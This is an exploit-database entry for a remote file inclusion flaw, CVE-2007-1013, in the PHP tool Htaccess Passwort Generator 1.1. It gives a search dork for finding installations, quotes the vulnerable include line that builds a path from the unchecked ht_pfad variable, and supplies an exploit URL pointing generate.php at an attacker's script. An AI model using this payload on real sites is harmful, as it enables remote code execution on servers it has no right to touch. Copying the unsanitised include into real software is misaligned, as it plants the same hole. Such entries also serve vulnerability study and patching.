Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion

Author: kezzap66345
type: webapps
platform: php
port: 
date_added: 2007-02-15 
date_updated:  
verified: 1 
codes: OSVDB-33244;CVE-2007-1013 
tags: 
aliases:  
screenshot_url:  
application_url: 

********Htaccess_gen_V[1].1.1_(C)**********
Htaccess Passwort Generator V.1.1
Discovered By:- kezzap66345
Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHP_Scripte&seite=2
dork:ht_gen.php

code:

include ($ht_pfad."/tpl/ok.html");

exploit
http://target/[path]/generate.php?ht_pfad=3vil script?
I am a Turk..

# milw0rm.com [2007-02-16]